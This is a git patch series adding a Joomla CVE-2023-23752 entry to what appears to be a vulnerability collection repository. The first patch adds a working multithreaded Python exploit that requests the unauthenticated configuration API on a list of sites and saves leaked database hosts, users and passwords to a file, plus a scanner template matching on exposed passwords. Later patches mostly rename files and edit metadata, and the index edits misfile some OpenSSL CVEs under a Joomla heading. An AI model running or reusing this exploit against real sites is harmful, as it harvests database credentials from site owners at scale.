From 84317197629ad5e16272b1cf0a45bec071a5b81a Mon Sep 17 00:00:00 2001 From: maoran Date: Wed, 15 Mar 2023 15:48:42 +0800 Subject: [PATCH 1/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-23752/CVE-2023-25136.py | 41 +++++++++++++++++++ cve/openssl/2023/CVE-2023-23752/README.md | 14 +++++++ cve/openssl/2023/yaml/CVE-2023-23752.yaml | 40 ++++++++++++++++++ openkylin_list.yaml | 1 + 4 files changed, 96 insertions(+) create mode 100644 cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py create mode 100644 cve/openssl/2023/CVE-2023-23752/README.md create mode 100644 cve/openssl/2023/yaml/CVE-2023-23752.yaml diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py new file mode 100644 index 00000000..59ef149d --- /dev/null +++ b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py @@ -0,0 +1,41 @@ +#An issue was discovered in Joomla! 4.0.0 through +#4.2.7. An improper access check allows +#unauthorized access to webservice endpoints. +import requests,time,re,random,os,sys,json +from multiprocessing.dummy import Pool as ThreadPool +from colorama import Fore,Style, init +init(autoreset=True) + +r = Fore.RED + Style.BRIGHT +g = Fore.GREEN + Style.BRIGHT +c = Fore.CYAN + Style.BRIGHT +y = Fore.YELLOW + Style.BRIGHT +o = Fore.RESET + Style.RESET_ALL + + +def jomprv(url): + try: + headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.61 Mobile Safari/537.36'} + asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10) + if 'dbtype' in asw.content: + hoset = re.findall('"host":"(.*?)"',asw.content)[0] + debst = re.findall('"db":"(.*?)"',asw.content)[0] + uset = re.findall('"user":"(.*?)"',asw.content)[0] + paset = re.findall('"password":"(.*?)"',asw.content)[0] + print ("Domaij" + " : " + url) + print (g + "HOST" + " : " + hoset) + print (g + "DB" + " : " + debst) + print (g + "User" + " : " + uset) + print (g + "Pass" + " : " + paset) + open('res.txt', 'a').write('\n!== Results Joomla CVE-2023-23752 ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n') + else: + print(r+ 'BAD' + ' ' + url) + #for res in regex: + except: + pass +print "{}JOOMLA! CVE-2023-23752 | Shin Code\n".format(y) +url = open(raw_input(o+'List:~# '),'r').read().splitlines() +pool = ThreadPool(int(30)) +pool.map(jomprv, url) +pool.close() +pool.join() \ No newline at end of file diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/openssl/2023/CVE-2023-23752/README.md new file mode 100644 index 00000000..f6c41690 --- /dev/null +++ b/cve/openssl/2023/CVE-2023-23752/README.md @@ -0,0 +1,14 @@ +# Joomla-CVE-2023-23752 +python 2.7 + +Buy Coffee : + +Bitcoin $: 31mtLHqhaXXyCMnT2EU73U8fwYwigiEEU1 + +Perfect Money $: U22270614 + +Saweria $: https://saweria.co/Shin403 + +Trakteer $: https://trakteer.id/shin403 + +![Screenshot_2023-03-11-18-20-57-172-edit_com termux](https://user-images.githubusercontent.com/59664965/224481416-8fd859c7-ecb3-40e9-9730-2187b2ca388a.jpg) diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/openssl/2023/yaml/CVE-2023-23752.yaml new file mode 100644 index 00000000..a8187499 --- /dev/null +++ b/cve/openssl/2023/yaml/CVE-2023-23752.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-23752 + +info: + name: CVE-2023-23752-joomla + author: hakimi + severity: high + description: description + reference: + - https://cve.report/CVE-2023-23752 + tags: CVE-2023-23752 + +requests: + - raw: + - |+ + GET /api/index.php/v1/config/application?public=true HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3 + Connection: close + matchers-condition: and + matchers: + - type: word + part: body + words: + - "links" + - '"password":' + + - type: word + part: body + words: + - "attributes" + + - type: status + status: + - 200 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 897401df..bb775b10 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -80,6 +80,7 @@ cve: - CVE-2023-25136 - CVE-2021-3449 - CVE-2022-0778 + - CVE-2023-23752 libxml2: - CVE-2020-24977 - CVE-2021-3517 -- Gitee From dd03178f85cae4f894ffca01905abd5957e5998e Mon Sep 17 00:00:00 2001 From: maoran Date: Wed, 15 Mar 2023 17:56:47 +0800 Subject: [PATCH 2/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-23752/CVE-2023-23752.py} | 0 cve/{openssl => joomla}/2023/CVE-2023-23752/README.md | 0 cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml | 0 openkylin_list.yaml | 2 ++ 4 files changed, 2 insertions(+) rename cve/{openssl/2023/CVE-2023-23752/CVE-2023-25136.py => joomla/2023/CVE-2023-23752/CVE-2023-23752.py} (100%) rename cve/{openssl => joomla}/2023/CVE-2023-23752/README.md (100%) rename cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml (100%) diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py similarity index 100% rename from cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py rename to cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/joomla/2023/CVE-2023-23752/README.md similarity index 100% rename from cve/openssl/2023/CVE-2023-23752/README.md rename to cve/joomla/2023/CVE-2023-23752/README.md diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml similarity index 100% rename from cve/openssl/2023/yaml/CVE-2023-23752.yaml rename to cve/joomla/2023/yaml/CVE-2023-23752.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index bb775b10..35e701bc 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -79,7 +79,9 @@ cve: - CVE-2022-3602 - CVE-2023-25136 - CVE-2021-3449 + joomla: - CVE-2022-0778 + - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee From c98a96e0ebbd70a623ad4e62aeee430d81cd76dd Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 08:56:56 +0000 Subject: [PATCH 3/7] update cve/joomla/2023/yaml/CVE-2023-23752.yaml. --- cve/joomla/2023/yaml/CVE-2023-23752.yaml | 54 ++++++++---------------- 1 file changed, 18 insertions(+), 36 deletions(-) diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index a8187499..01104ac9 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -1,40 +1,22 @@ id: CVE-2023-23752 - +source: + https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: name: CVE-2023-23752-joomla - author: hakimi - severity: high - description: description + severity: medium + description: + 在Joomla!4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。 + scope-of-influence: + Joomla! 4.0.0 through 4.2.7 + OpenSSL 9.1 reference: - - https://cve.report/CVE-2023-23752 - tags: CVE-2023-23752 - -requests: - - raw: - - |+ - GET /api/index.php/v1/config/application?public=true HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3 - Connection: close - matchers-condition: and - matchers: - - type: word - part: body - words: - - "links" - - '"password":' - - - type: word - part: body - words: - - "attributes" - - - type: status - status: - - 200 + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + cwe-id: NVD-CWE-Other + cnvd-id: None + kve-id: None + tags: + - 非法访问 \ No newline at end of file -- Gitee From 5b59893063e5b474a13265268cae152141159d33 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 08:59:24 +0000 Subject: [PATCH 4/7] update openkylin_list.yaml. Signed-off-by: lavendes44 --- openkylin_list.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 35e701bc..67b6e2b3 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -81,7 +81,6 @@ cve: - CVE-2021-3449 joomla: - CVE-2022-0778 - - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee From 4483722c0781db37a7ace51909bae478410d9c71 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 09:03:41 +0000 Subject: [PATCH 5/7] update cve/joomla/2023/yaml/CVE-2023-23752.yaml. Signed-off-by: lavendes44 --- cve/joomla/2023/yaml/CVE-2023-23752.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 01104ac9..40166d53 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -2,20 +2,19 @@ id: CVE-2023-23752 source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: - name: CVE-2023-23752-joomla + name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium description: 在Joomla!4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。 scope-of-influence: Joomla! 4.0.0 through 4.2.7 - OpenSSL 9.1 reference: - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - cwe-id: NVD-CWE-Other + cwe-id: None cnvd-id: None kve-id: None tags: -- Gitee From 72bb8c9d5ae94a357c56183bc556e19ea6ae2a80 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 09:05:08 +0000 Subject: [PATCH 6/7] update openkylin_list.yaml. --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 80cfbfc3..296bf60c 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -115,6 +115,7 @@ cve: - CVE-2021-3449 joomla: - CVE-2022-0778 + - CVE-2022-3786 - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee From b575c9d13f152a241440c58fdbca5d285e748ae7 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 11:01:15 +0000 Subject: [PATCH 7/7] update openkylin_list.yaml. --- openkylin_list.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 296bf60c..83d154a9 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -113,9 +113,9 @@ cve: - CVE-2022-3602 - CVE-2023-25136 - CVE-2021-3449 - joomla: - CVE-2022-0778 - CVE-2022-3786 + joomla: - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee